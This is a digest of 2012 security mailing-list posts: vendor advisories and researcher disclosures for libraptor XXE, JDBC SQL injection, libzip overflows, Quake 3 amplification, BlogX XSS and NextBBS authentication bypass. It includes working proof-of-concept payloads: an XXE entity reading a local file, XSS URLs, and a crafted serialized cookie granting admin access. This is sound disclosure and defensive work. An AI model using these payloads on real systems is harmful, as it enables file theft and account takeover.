CVE-2012-0037: libraptor - XXE in RDF/XML File Interpretation (Multiple office products affected)

2012-03-27 Thread VSR Advisories


 VSR Security Advisory
   http://www.vsecurity.com/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Advisory Name: libraptor - XXE in RDF/XML File Interpretation
 Release Date: 2012-03-24
 Applications: libraptor / librdf (versions 1.x and 2.x)
Also Affected: OpenOffice 3.x, LibreOffice 3.x, AbiWord, KOffice
   Author: tmorgan {a} vsecurity * com
Vendor Status: Patches available; major downstream vendors
   and operating system distributions notified
CVE Candidate: CVE-2012-0037
Reference: http://www.vsecurity.com/resources/advisory/20120324-1/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Product Description
~~~~~~~~~~~~~~~~~~~
Raptor is a free software / Open Source C library that provides a set of
 parsers and serializers that generate Resource Description Framework (RDF)
 triples by parsing syntaxes or serialize the triples into a syntax. The
 supported parsing syntaxes are RDF/XML, N-Quads, N-Triples, TRiG, Turtle, RSS
 tag soup including all versions of RSS, Atom 1.0 and 0.3, GRDDL and
 microformats for HTML, XHTML and XML and RDFa. The serializing syntaxes are
 RDF/XML (regular, and abbreviated), Atom 1.0, GraphViz, JSON, N-Quads,
 N-Triples, RSS 1.0 and XMP. -- libraptor web site [1]

libraptor is a component of librdf[2] which is used by a variety of open source
software to interpret Resource Description Framework (RDF) [3] formats.


Vulnerability Overview
~~~~~~~~~~~~~~~~~~~~~~
In December 2011, VSR identified a vulnerability in multiple open source office
products (including OpenOffice, LibreOffice, KOffice, and AbiWord) due to unsafe
interpretation of XML files with custom entity declarations. Deeper analysis
revealed that the vulnerability was caused by acceptance of external entities by
the libraptor library, which is used by librdf and is in turn used by these
office products.

In the context of office applications, these vulnerabilities could allow for XML
External Entity (XXE) attacks resulting in file theft and a loss of user privacy
when opening potentially malicious ODF documents.  For other applications which
depend on librdf or libraptor, potentially serious consequences could result
from accepting RDF/XML content from untrusted sources, though the impact may
vary widely depending on the context.


Vulnerability Details
~~~~~~~~~~~~~~~~~~~~~
Open Document Format (ODF) files consist of a collection of several different
files stored in a ZIP archive.  Included in this set is a manifest.rdf file
which is formatted according to the RDF/XML representation.  The RDF format is
intended to be used for storing metadata associated with specific document
elements.  The manifest.rdf file can reference secondary RDF files within the
ODF file as well as external document schemas.

The RDF file parser (librdf) used by the affected office products allows DTD
specifications within the RDF files themselves.  In addition, the parser
interprets external entities which may reference arbitrary external files, HTTP
and FTP resources.

For instance, the following evil.rdf file was created within a valid ODF text
archive (.odt file) which was referenced by the internal manifest.rdf file:


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE rdf [
   <!ENTITY file SYSTEM "file:///c:/windows/win.ini">
]>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
  <rdf:Description rdf:about="content.xml#id1265690860">
<ns0:comment
xmlns:ns0="http://www.w3.org/2000/01/rdf-schema#">&file;</ns0:comment>
  </rdf:Description>
</rdf:RDF>



Upon opening the malicious .odt file in OpenOffice for Windows, the
c:\windows\win.ini file was read and included in the document metadata.  Upon
saving the document, this metadata was included literally in the resulting
evil.rdf file (within the .odt):

<?xml version="1.0" encoding="utf-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
  <rdf:Description rdf:about="content.xml#id1265690860">
<ns1:comment xmlns:ns1="http://www.w3.org/2000/01/rdf-schema#">; for
16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
</ns1:comment>
  </rdf:Description>
</rdf:RDF>


The malicious XML entities could also include URLs to attacker-controlled
HTTP or FTP resources.  This would allow an attacker to determine when a
document was opened, potentially resulting in reduced privacy.  However, based
on current analysis of the affected office applications, the most serious attack
scenario is likely to be:

1. Attacker posts a malicious file on a web site or sends file to victim.  The
file contains a form for the victim to fill out and return to the attacker.

2. Victim fills out the form, saves it, sends it back to the attacker.

3. Attacker is able to read the contents of any stolen files as embedded
metadata, simply by unzipping the 

[SECURITY] [DSA 2440-1] libtasn1-3 security update

2012-03-27 Thread Florian Weimer
-------------------------------------------------------------------------
Debian Security Advisory DSA-2440-1                   secur...@debian.org
http://www.debian.org/security/                            Florian Weimer
March 24, 2012                         http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package: libtasn1-3
Vulnerability  : missing bounds check
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-1569

Matthew Hall discovered that many callers of the asn1_get_length_der
function did not check the result against the overall buffer length
before processing it further.  This could result in out-of-bounds
memory accesses and application crashes.  Applications using GNUTLS
are exposed to this issue.

For the stable distribution (squeeze), this problem has been fixed in
version 2.7-1+squeeze+1.

For the unstable distribution (sid), this problem has been fixed in
version 2.12-1.

We recommend that you upgrade your libtasn1-3 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



SQL injection attack possible when connecting to PostgreSQL 9.1 with version 8.1 JDBC driver

2012-03-27 Thread Steffen Dettmer
Hi,

when using PostgreSQL JDBC driver version 8.1 to connect to a PostgreSQL
version 9.1 database, escaping of JDBC statement parameters does
not work and SQL injection attacks are possible.

The problem can be reproduced for example with version 8.1-415
(released 2010-05-11), which still can be downloaded from the
official download location (although in `Archived Section'),
however this version is included in Linux distributions that are
still supported (for example SuSE Linux Enterprise Edition with
long-term support).

Connecting Java applications from such a server to a recent
PostgreSQL database, SQL injection attacks are possible.

Java Web Applications using JDBC running on such Linux versions
could allow to exploit this remotely, for example through a web app.



Vendor response (from secur...@postgresql.org):

 Anything not identified there as current or supported is, by
 reasonable inference, neither. Reporting a security bug
 against anything that's not current or supported is pointless.

However, such unsupported driver versions are included in
supported Linux distributions.

Since I think it is possible to accidentally use older (but still
supported) Linux application servers against recent databases, I
think public information could be of interest.



Possible fix or workaround:

Do not use PostgreSQL JDBC driver version 8.1 but upgrade to the most
recent version. If the distribution offers no suitable package
(RPM), the driver should be downloaded from jdbc.postgresql.org and
installed manually. This breaks package management consistency but
seems to be the smaller issue.



How to reproduce:

When the small program Postgres.java (attached) is compiled and
run with Java 1.7 and the Postgres 8.1 JDBC3 driver against a
Postgres 9.1 database:

  $ java -cp postgresql-8.1-415.jdbc3.jar:. Postgres

the following exception occurs:

  Exception in thread "main" org.postgresql.util.PSQLException:
ERROR:  syntax error at or near "(" at character 134

The driver can be downloaded under

  http://jdbc.postgresql.org/download/postgresql-8.1-415.jdbc3.jar

in the Archived Versions section of http://jdbc.postgresql.org/download.html.

(They are not supported anymore, but there is no hint that
downloading and using them, in our point of view, opens a security
threat, so we think this is not good)

When the application is run with the Postgres 9.1 JDBC3 driver,
it behaves correctly.

We think it is likely that JDBC drivers 8.1-x are still used
in production, for example on SuSE Linux Enterprise Edition with
long-term support, and we are not aware of any security bulletin
stating that an upgrade is recommended for security reasons,
since there might be not much interest in changing running
systems without need.

Regards,
Steffen Dettmer




---8<---
* Steffen Dettmer wrote on Mon, Feb 27, 2012 at 17:36 +0100:
 Hi,

 we think we have found an escaping problem in JDBC driver 8.1 allowing
 SQL injection attacks when connecting to PostgreSQL 9.1. According to
 http://jdbc.postgresql.org/changes.html#version_8.1-415, this
 issue is not known (not fixed).
 [...]
 Our software relies on correct parameter escaping when using a
 java.sql.PreparedStatement for "SELECT stored_procedure(?, ?) AS
 result" used with statement.setString() etc., which according to our
 understanding should be the usual and safe way to call stored
 procedures on PostgreSQL.

 We found that it fails with at least postgresql-8.1-407.jdbc3.jar
 from http://jdbc.postgresql.org/download.html and Postgres 9.1
 database.

 The exact case where it occurred in production was the query:

 SELECT appendJobEvent(?, ?, ?, ?) AS result

 with parameters set via setString(pos, value). Parameter
 number 4 contained single quote characters, but they should be
 escaped and end up in the database literally.

 Instead, we get:

   ERROR:  syntax error at or near "(" at character 163 (ERROR:
   syntax error at or near "(" at character 163)'

 We tested and got exactly the same error message when using the string
 directly (i.e. not via ? and setString), which is expected.

 Connecting to an older database version (7.1) or updating the driver
 to postgresql-9.1-901.jdbc3.jar from
 http://jdbc.postgresql.org/download.html both make the same query
 with the same parameters work.

 Since our development environment unit tests check for a similar
 issue, it seems that when using the same version of JDBC driver and
 database (the normal configuration when having a test database on
 localhost), escaping probably works well in a probably wide range of
 versions, but not in at least this combination (8.1-407 JDBC driver to
 9.1 DBMS).

--[ Postgres.java ]--8<---

// Sascha BAER sascha.b...@ingenico.com -- SFR-1315206
// SQL injection when connecting to PostgreSQL 9.1 with version 8.1 JDBC driver
import java.sql.Connection;
import java.sql.DriverManager;
import 

[SECURITY] [DSA 2441-1] gnutls26 security update

2012-03-27 Thread Florian Weimer
-------------------------------------------------------------------------
Debian Security Advisory DSA-2441-1                   secur...@debian.org
http://www.debian.org/security/                            Florian Weimer
March 25, 2012                         http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package: gnutls26
Vulnerability  : missing bounds check
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-1573

Matthew Hall discovered that GNUTLS does not properly handle truncated
GenericBlockCipher structures nested inside TLS records, leading to
crashes in applications using the GNUTLS library.

For the stable distribution (squeeze), this problem has been fixed in
version 2.8.6-1+squeeze2.

For the unstable distribution (sid), this problem has been fixed in
version 2.12.18-1 of the gnutls26 package and version 3.0.17-2 of the
gnutls28 package.

We recommend that you upgrade your gnutls26 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Traffic amplification via Quake 3-based servers

2012-03-27 Thread Simon McVittie
It has been discovered that spoofed getstatus UDP requests are being
used by attackers[0][1][2][3] to direct status responses from multiple
Quake 3-based servers to a victim, as a traffic amplification mechanism
for a denial of service attack on that victim.

Open-source games derived from the Quake 3 engine are typically based on
ioquake3 [4], a popular fork of that engine. This vulnerability was
fixed in ioquake3 svn revision 1762 (January 2010) [5] by applying a
rate-limit to the getstatus request. Like several other known and fixed
vulnerabilities, it is not fixed in the latest official ioquake3 release
(1.36, April 2009).

If a CVE ID is allocated for this vulnerability, please reference
ioquake3 r1762 prominently in any advisory.

Fixed versions of various open-source games based on Quake III Arena,
mostly based on visual inspection of their source code:

* ioquake3 svn >= r1762
* OpenArena >= 0.8.8
* OpenArena engine snapshot >= 0.8.x-20
* World of Padman >= 1.5.4
* Tremulous svn trunk >= r1953
* Tremulous svn, gpp branch >= r1955
* Smokin' Guns >= 1.1b4
* Smokin' Guns svn 1.1 branch >= r472

Vulnerable older versions include:

* ioquake3 engine 1.36
* OpenArena 0.8.5
* World of Padman 1.5
* Tremulous 1.1.0
* Tremulous Gameplay Preview 1 (GPP1)
* Smokin' Guns svn trunk at the time of writing (r181)

Proprietary games based on the Quake 3 engine (Quake III Arena
when played using its official engine, Star Wars: Jedi Outcast and Jedi
Academy, Star Trek: Elite Force 1 & 2, etc.) are also likely to be
vulnerable.

Proprietary games being run under the ioquake3 engine (Quake III Arena
when using ioquake3, Urban Terror when using ioUrbanTerror, etc.) may be
vulnerable or not vulnerable, depending on the version of ioquake3 used.

[0]
http://lists.ioquake.org/pipermail/ioquake3-ioquake.org/2012-January/004778.html
[1] http://openarena.ws/board/index.php?topic=4391.0
[2] http://www.urbanterror.info/forums/topic/27825-drdos/
[3] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=665656
[4] http://ioquake3.org/
[5] http://icculus.org/pipermail/quake3-commits/2010-January/001679.html


[ MDVSA-2012:038 ] openssl

2012-03-27 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2012:038
 http://www.mandriva.com/security/
 ___

 Package : openssl
 Date: March 26, 2012
 Affected: 2010.1, 2011., Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in openssl:
 
 The implementation of Cryptographic Message Syntax (CMS) and PKCS #7 in
 OpenSSL before 0.9.8u and 1.x before 1.0.0h does not properly restrict
 certain oracle behavior, which makes it easier for context-dependent
 attackers to decrypt data via a Million Message Attack (MMA) adaptive
 chosen ciphertext attack (CVE-2012-0884).
 
 The mime_param_cmp function in crypto/asn1/asn_mime.c in OpenSSL before
 0.9.8u and 1.x before 1.0.0h allows remote attackers to cause a denial
 of service (NULL pointer dereference and application crash) via a
 crafted S/MIME message, a different vulnerability than CVE-2006-7250
 (CVE-2012-1165).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0884
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1165
 ___

 Updated Packages:


Matthew1471s ASP BlogX - XSS Vulnerabilities

2012-03-27 Thread demonalex
Title: Matthew1471s ASP BlogX - XSS Vulnerabilities

Software : Matthew1471s ASP BlogX

Software Version : 12 August 2008

Vendor: http://blogx.co.uk/ 

Vulnerability Published : 2012-03-26

Vulnerability Update Time :

Status : 

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:P/I:N/A:N)

Bug Description :
Matthew1471s ASP BlogX(version update : 12 August 2008) is vulnerable to XSS.

Proof Of Concept :
1)ShowOriginal in About.asp , PoC:
http://VICTIM/About.asp?ShowOriginal=;SCRIPTalert(demonalex);/SCRIPTShowNew=aShowChanges=b

2)ShowNew in About.asp , PoC:
http://VICTIM/About.asp?ShowOriginal=YShowNew=;SCRIPTalert(demonalex);/SCRIPTShowChanges=b

3)ShowChanges in About.asp , PoC:
http://VICTIM/About.asp?ShowOriginal=YShowNew=aShowChanges=;SCRIPTalert(demonalex);/SCRIPT

4)Search in Search.asp , PoC:
http://VICTIM/Search.asp?Search=/titleSCRIPTalert(demonalex);/SCRIPTPage=0

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / chaoyi.hu...@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK


[SECURITY] [DSA 2442-1] openarena security update

2012-03-27 Thread Florian Weimer
-------------------------------------------------------------------------
Debian Security Advisory DSA-2442-1                   secur...@debian.org
http://www.debian.org/security/                            Florian Weimer
March 26, 2012                         http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package: openarena
Vulnerability  : UDP traffic amplification
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2010-5077
Debian Bug : 665656

It has been discovered that spoofed getstatus UDP requests are being
sent by attackers to servers for use with games derived from the
Quake 3 engine (such as openarena).  These servers respond with a
packet flood to the victim whose IP address was impersonated by the
attackers, causing a denial of service.

For the stable distribution (squeeze), this problem has been fixed in
version 0.8.5-5+squeeze2.

For the testing distribution (wheezy) and the unstable distribution
(sid), this problem has been fixed in version 0.8.5-6.

We recommend that you upgrade your openarena packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[SECURITY] [DSA 2443-1] linux-2.6 security update

2012-03-27 Thread dann frazier
-------------------------------------------------------------------------
Debian Security Advisory DSA-2443-1                   secur...@debian.org
http://www.debian.org/security/                              Dann Frazier
March 26, 2012                         http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package: linux-2.6
Vulnerability  : privilege escalation/denial of service
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2009-4307 CVE-2011-1833 CVE-2011-4347 CVE-2012-0045
 CVE-2012-1090 CVE-2012-1097

Several vulnerabilities have been discovered in the Linux kernel that may lead
to a denial of service or privilege escalation. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2009-4307

Nageswara R Sastry reported an issue in the ext4 filesystem. Local users
with the privileges to mount a filesystem can cause a denial of service
(BUG) by providing a s_log_groups_per_flex value greater than 31.

CVE-2011-1833

Vasiliy Kulikov of Openwall and Dan Rosenberg discovered an information
leak in the eCryptfs filesystem. Local users were able to mount arbitrary
directories.

CVE-2011-4347

Sasha Levin reported an issue in the device assignment functionality in
KVM. Local users with permission to access /dev/kvm could assign unused pci
devices to a guest and cause a denial of service (crash).

CVE-2012-0045

Stephan Barwolf reported an issue in KVM. Local users in a 32-bit guest
running on a 64-bit system can crash the guest with a syscall instruction.

CVE-2012-1090

CAI Qian reported an issue in the CIFS filesystem. A reference count leak
can occur during the lookup of special files, resulting in a denial of
service (oops) on umount.

CVE-2012-1097

H. Peter Anvin reported an issue in the regset infrastructure. Local users
can cause a denial of service (NULL pointer dereference) by triggering the
write methods of readonly regsets.

For the stable distribution (squeeze), this problem has been fixed in version
2.6.32-41squeeze2.

The following matrix lists additional source packages that were rebuilt for
compatibility with or to take advantage of this update:

 Debian 6.0 (squeeze)
 user-mode-linux 2.6.32-1um-4+41squeeze2

We recommend that you upgrade your linux-2.6 and user-mode-linux packages.

Thanks to Micah Anderson for proof reading this text.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[PRE-SA-2012-02] Incorrect loop construct and numeric overflow in libzip

2012-03-27 Thread Timo Warns
PRE-CERT Security Advisory
==========================

* Advisory: PRE-SA-2012-02
* Released on: 21st March 2012
* Affected products: libzip <= 0.10
                     PHP 5.4.0
                     PHP <= 5.3.10
                     zipruby <= 0.3.6
* Impact: heap overflow, information leak
* Credit: - Thomas Klausner
          - Timo Warns (PRESENSE Technologies GmbH)
* CVE Identifier: - CVE-2012-1162
                  - CVE-2012-1163


Summary
-------

libzip (version <= 0.10) has two vulnerabilities that may lead to a heap
overflow or an information leak via corrupted zip files. PHP (versions
5.4.0 and <= 5.3.10) and the Ruby binding zipruby (version <= 0.3.6) are
also affected as they include copies of affected libzip versions.

* CVE-2012-1162

libzip (version <= 0.10) uses an incorrect loop construct, which can
result in a heap overflow on corrupted zip files.

On opening a zip file with zip_open, libzip reads in the number of
directory entries in the function _zip_readcdir in zip_open.c:

(192)    /* number of cdir-entries */
(193)    nentry = _zip_read2(&cdp);

Subsequently, memory for directory entries is allocated via
_zip_cdir_new (in zip_dirent.c) based on the number of directory
entries:

(104)    if ((cd->entry=(struct zip_dirent *)malloc(sizeof(*(cd->entry))*nentry))

If the number of directories in the zip file is set to 0, 0 bytes of
memory are allocated.

_zip_readcdir finishes with reading in the directory entries in
a posttest do-while loop:

(260)    do {
(261)        if ((_zip_dirent_read(cd->entry+i, fp, &bufp, &left, 0, error)) < 0) {
             ...
(277)    } while (i<cd->nentry && left > 0);

If cd->entry points to 0 bytes of allocated memory, _zip_dirent_read
writes beyond the allocated memory.

* CVE-2012-1163

libzip (version <= 0.10) has a numeric overflow condition, which,
for example, results in improper restrictions of operations within
the bounds of a memory buffer (e.g., allowing information leaks).

On opening a zip file with zip_open, libzip reads in the size and the
offset of the central directory structure in the function _zip_readcdir
in zip_open.c:

(198)    cd->size = _zip_read4(&cdp);
(199)    cd->offset = _zip_read4(&cdp);

libzip performs a consistency check on these values, but does not
anticipate an integer overflow:

(203)    if (cd->offset+cd->size > buf_offset + (eocd-buf)) {

On an integer overflow, libzip continues to handle the zip file, which,
for example, can result in improper restriction of operations within the
bounds of a memory buffer.
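To make the two defects concrete, here is an added model of the loop and the range check described above, beside a hardened form; it is not libzip's code, and the record layout, constants and function names (readcdir_original_shape, readcdir_fixed, the demo_* helpers) are constructed for the illustration. Writes are only counted, so the "original shape" reports how many entries it would have stored past a zero-entry allocation instead of corrupting memory.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed record layout for this example (not the real ZIP EOCD record):
 * 2-byte nentry, 4-byte cd size, 4-byte cd offset, little-endian, then the
 * directory bytes; each fake directory entry is ENTRY_LEN bytes. */
#define HDR_LEN   10
#define ENTRY_LEN 4

enum { ERR_NONE = 0, ERR_SHORT = 1, ERR_RANGE = 2, ERR_OVERFLOW = 3, ERR_COUNT = 4 };

struct cdir {
    uint16_t nentry; uint32_t size, offset;
    size_t allocated;   /* entries reserved: models malloc(sizeof(entry) * nentry) */
    size_t written;     /* entries the read loop stored */
    int error;
};

static uint16_t rd2(const unsigned char *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd4(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static int read_header(const unsigned char *buf, size_t len, struct cdir *cd) {
    memset(cd, 0, sizeof *cd);
    if (len < HDR_LEN) { cd->error = ERR_SHORT; return -1; }
    cd->nentry    = rd2(buf);
    cd->size      = rd4(buf + 2);
    cd->offset    = rd4(buf + 6);
    cd->allocated = cd->nentry;   /* nentry == 0 models malloc(0) */
    return 0;
}

/* Shape of the original checks: the uint32 sum in the range test can wrap, and
 * the post-test do-while stores one entry before comparing i with nentry.
 * Writes are only counted, never performed, so nothing is corrupted here. */
struct cdir readcdir_original_shape(const unsigned char *buf, size_t len, uint32_t cd_end) {
    struct cdir cd;
    size_t left, i = 0;
    if (read_header(buf, len, &cd) < 0) return cd;
    if (cd.offset + cd.size > cd_end) { cd.error = ERR_RANGE; return cd; }  /* may wrap */
    left = len - HDR_LEN;
    do {
        if (left < ENTRY_LEN) { cd.error = ERR_SHORT; return cd; }
        cd.written++;             /* stands in for cd->entry[i] = ... */
        left -= ENTRY_LEN;
        i++;
    } while (i < cd.nentry && left > 0);
    return cd;
}

/* Hardened shape: overflow test before the range test, pre-test loop so zero
 * declared entries means zero writes, and a truncated directory is an error. */
struct cdir readcdir_fixed(const unsigned char *buf, size_t len, uint32_t cd_end) {
    struct cdir cd;
    size_t left, i = 0;
    if (read_header(buf, len, &cd) < 0) return cd;
    if (cd.offset > UINT32_MAX - cd.size) { cd.error = ERR_OVERFLOW; return cd; }
    if (cd.offset + cd.size > cd_end)     { cd.error = ERR_RANGE;    return cd; }
    left = len - HDR_LEN;
    while (i < cd.nentry && left >= ENTRY_LEN) {
        cd.written++;
        left -= ENTRY_LEN;
        i++;
    }
    if (i != cd.nentry) cd.error = ERR_COUNT;
    return cd;
}

/* Builds a constructed header followed by ndir bytes of filler directory data. */
static void wr4(unsigned char *o, uint32_t v) { int k; for (k = 0; k < 4; k++) o[k] = (unsigned char)(v >> (8 * k)); }
static size_t make_input(unsigned char *out, uint16_t nentry, uint32_t size, uint32_t offset, size_t ndir) {
    out[0] = (unsigned char)nentry; out[1] = (unsigned char)(nentry >> 8);
    wr4(out + 2, size); wr4(out + 6, offset);
    memset(out + HDR_LEN, 0xAA, ndir);
    return HDR_LEN + ndir;
}

/* CVE-2012-1162 model: nentry says 0 but one entry's worth of bytes follows.
 * Returns written - allocated; a positive value is a write past the allocation. */
int demo_zero_entries(int fixed) {
    unsigned char buf[HDR_LEN + ENTRY_LEN];
    size_t len = make_input(buf, 0, ENTRY_LEN, 0, ENTRY_LEN);
    struct cdir cd = fixed ? readcdir_fixed(buf, len, 1000) : readcdir_original_shape(buf, len, 1000);
    return (int)cd.written - (int)cd.allocated;
}

/* CVE-2012-1163 model: offset + size wraps past 2^32 and lands below cd_end.
 * Returns the parser's error code; the original shape accepts the file. */
int demo_wrapped_range(int fixed) {
    unsigned char buf[HDR_LEN + ENTRY_LEN];
    size_t len = make_input(buf, 1, 0x20, 0xFFFFFFF0u, ENTRY_LEN);
    struct cdir cd = fixed ? readcdir_fixed(buf, len, 1000) : readcdir_original_shape(buf, len, 1000);
    return cd.error;
}
```

Called from a main(), demo_zero_entries(0) reports 1 entry stored past a zero-entry allocation while demo_zero_entries(1) reports 0, and demo_wrapped_range(0) returns ERR_NONE (the file is accepted) while demo_wrapped_range(1) returns ERR_OVERFLOW.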


Solution
--------

The issues were fixed in the following versions:

libzip 0.10.1

The issues have not yet been fixed in PHP and zipruby.


References
----------

When further information becomes available, this advisory will be
updated. The most recent version of this advisory is available at:

http://www.pre-cert.de/advisories/PRE-SA-2012-02.txt


Contact
-------

PRE-CERT can be reached under prec...@pre-secure.de. For PGP key
information, refer to http://www.pre-cert.de/.


[ MDVSA-2012:039 ] libtasn1

2012-03-27 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2012:039
 http://www.mandriva.com/security/
 ___

 Package : libtasn1
 Date: March 27, 2012
 Affected: 2010.1, 2011., Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in libtasn1:
 
 The asn1_get_length_der function in decoding.c in GNU Libtasn1 before
 2.12, as used in GnuTLS before 3.0.16 and other products, does not
 properly handle certain large length values, which allows remote
 attackers to cause a denial of service (heap memory corruption and
 application crash) or possibly have unspecified other impact via a
 crafted ASN.1 structure (CVE-2012-1569).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1569
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



[waraxe-2012-SA#080] - Multiple Vulnerabilities in NextBBS 0.6.0

2012-03-27 Thread come2waraxe
[waraxe-2012-SA#080] - Multiple Vulnerabilities in NextBBS 0.6.0
===

Author: Janek Vind waraxe
Date: 27. March 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-80.html


Description of vulnerable software:
~~~

nextBBS lets you create your own Community with unrivaled ease of use.
Even though the software is highly performant, it doesn't lack any feature
that makes big boards attractive. In fact, it offers the most Web 2.0
experience currently available. 

http://sourceforge.net/projects/forums/

Vulnerable versions
~~~

Affected is NextBBS version 0.6.0; older versions may be vulnerable
as well.

###
1. Authentication Bypass in user.php
###

Reason: using unsanitized user submitted data
Attack vector: user submitted cookie
Preconditions: none
Result: attacker can impersonate any user, including admins

Source code snippet from vulnerable script user.php:
-[ source code start ]-
// Cookie?
if(isset($_COOKIE[$CONFIG->sessions->name]) || 
isset($_SESSION[$CONFIG->sessions->name]))
{
..
if(isset($_COOKIE[$CONFIG->sessions->name]))
{
$scookie = $_COOKIE[$CONFIG->sessions->name];
..
// user-controlled cookie is unserialized without any validation
$cookie = unserialize(stripslashes($scookie));
..
$checkagainst = $this->generatePrivateKey($row['password']);
// loose comparison (==): a boolean true in $cookie['userkey'] matches any non-empty string
if($checkagainst == $cookie['userkey'])
{
$_SESSION['ID'] = $uid;
$this->setMember($_SESSION['ID']);
-[ source code end ]---

As seen above, the user submitted cookie is unserialized and the resulting
data is used for authentication. No input data validation exists.
An attacker can use a specially crafted cookie so that, after unserializing,
the variable $cookie['userkey'] is boolean true.
A comparison of the form if($checkagainst == $cookie['userkey']) is insecure
and will always return true if $cookie['userkey'] is boolean true.
This allows complete authentication bypass.

Test:

Array after serialization:
a:3:{s:3:"uid";s:4:"1219";s:7:"checker";s:1:"1";s:7:"userkey";b:1;}
After urlencoding:
a%3A3%3A%7Bs%3A3%3A%22uid%22%3Bs%3A4%3A%221219%22%3Bs%3A7%3A%22checker%22%3Bs%3A1%3A%221%22%3Bs%3A7%3A%22userkey%22%3Bb%3A1%3B%7D
Cookie:
nextBBS=a%3A3%3A%7Bs%3A3%3A%22uid%22%3Bs%3A4%3A%221219%22%3Bs%3A7%3A%22checker%22%3Bs%3A1%3A%221%22%3Bs%3A7%3A%22userkey%22%3Bb%3A1%3B%7D;


Now we will use Firefox with Tamper Data extension for easy cookie 
manipulation.
Let's open page in unauthenticated state and with crafted cookie:

http://localhost/nextbbs.0.6.0/

Result: Welcome back, waraxe. (Log out?) (Admin CP)

We have admin level access now, as expected.
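Added example (not NextBBS code): the loose comparison from user.php run against the advisory's crafted cookie, beside a hardened check that type-validates the unserialized value and compares strictly. generatePrivateKey() is a stand-in for the NextBBS method, whose derivation the advisory does not show.

```php
<?php
// Added example, not NextBBS code. generatePrivateKey() is a constructed
// stand-in; only the comparison logic is the point of interest.
function generatePrivateKey(string $passwordHash): string
{
    return hash('sha256', 'constructed-secret|' . $passwordHash);
}

// Vulnerable check, as in user.php: loose comparison against whatever
// type unserialize() produced.
function vulnerableCheck(string $passwordHash, array $cookie): bool
{
    $checkagainst = generatePrivateKey($passwordHash);
    return $checkagainst == $cookie['userkey'];   // bool(true) == "non-empty" is true
}

// Hardened check: reject anything that is not a string, then compare
// strictly and in constant time.
function hardenedCheck(string $passwordHash, array $cookie): bool
{
    if (!isset($cookie['userkey']) || !is_string($cookie['userkey'])) {
        return false;
    }
    return hash_equals(generatePrivateKey($passwordHash), $cookie['userkey']);
}

// The cookie value from the advisory, with userkey forced to boolean true.
$crafted = 'a:3:{s:3:"uid";s:4:"1219";s:7:"checker";s:1:"1";s:7:"userkey";b:1;}';

// allowed_classes => false blocks object injection, but scalars still come
// back as whatever type the attacker chose, so the is_string() check above
// remains necessary.
$cookie = unserialize($crafted, ['allowed_classes' => false]);

$storedHash = 'constructed-password-hash';
var_dump(vulnerableCheck($storedHash, $cookie)); // bool(true)  -> bypass
var_dump(hardenedCheck($storedHash, $cookie));   // bool(false) -> rejected
```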

###
2. SQL Injection in ajaxserver.php function findUsers
###

Reason: using unsanitized user submitted data in SQL queries
Attack vector: user submitted GET parameter curstr
Preconditions: none
Result: attacker can manipulate database queries

Source code snippet from vulnerable script ajaxserver.php:
-[ source code start ]-
function findUsers($method)
{
global $INPUT, $CONFIG, $DB;

